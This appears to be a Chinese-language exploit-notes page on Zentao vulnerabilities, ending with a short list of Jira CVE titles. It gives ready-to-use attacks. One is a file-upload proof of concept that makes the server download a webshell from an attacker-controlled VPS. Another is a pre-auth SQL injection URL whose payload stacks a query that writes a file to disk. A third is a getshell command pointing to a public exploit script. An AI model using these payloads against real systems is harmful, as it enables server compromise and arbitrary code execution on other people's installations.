跳转至

Zentao(禅道)

应用简介

禅道 ,项目管理软件

[CNVD-C-2020-121325]-文件上传

漏洞概述

#影响范围
Zentao <= 12.4.2 开源版

由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell

漏洞利用

POC

http://127.0.0.1/zentao/client-download-1-<base64 encode webshell download link>-1.html

http://127.0.0.1/zentao/data/client/1/<download link filename>

#这里需要自己开启一个VPS提供下载服务,然后把链接的base64位编码和自己的路径替换一下。
http://127.0.0.1/zentaopms/www/client-download-1-<base64 encode webshell download link>-1.html

上传位置zentaopms\www\data\client\1

免登录SQL注入

#影响版本
Zentao 9.1.2

漏洞利用

http://zentao.me/block-main.html?mode=getblockdata&blockid=case¶m=eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtzZWxlY3QgMTIzIGludG8gb3V0ZmlsZSAnZDoveHh4LnR4dCctLSAtIiwibnVtIjoiMSwxIiwidHlwZSI6Im9wZW5lZGJ5bWUifQ

解码之后如下,因为可以PDO可以多语句,那么就可以update或者写文件操作

{"orderBy":"order limit 1;select 123 into outfile 'd:/xxx.txt'-- -","num":"1,1","type":"openedbyme"}

前台Getshell

#影响版本
8.2 - 9.2.1

漏洞利用

EXP:https://github.com/jas502n/zentao-getshell

python exp.py http://127.0.0.1:81/ jas502n.php`

另一个项目管理软件Jira

🔸 Jira服务工作台路径遍历导致的敏感信息泄露漏洞(CVE-2019-14994) 🔸 Jira未授权SSRF漏洞(CVE-2019-8451) 🔸 Atlassian JIRA服务器模板注入漏洞(CVE-2019-11581) 🔸 CVE-2019-8449 JIRA 信息泄漏漏洞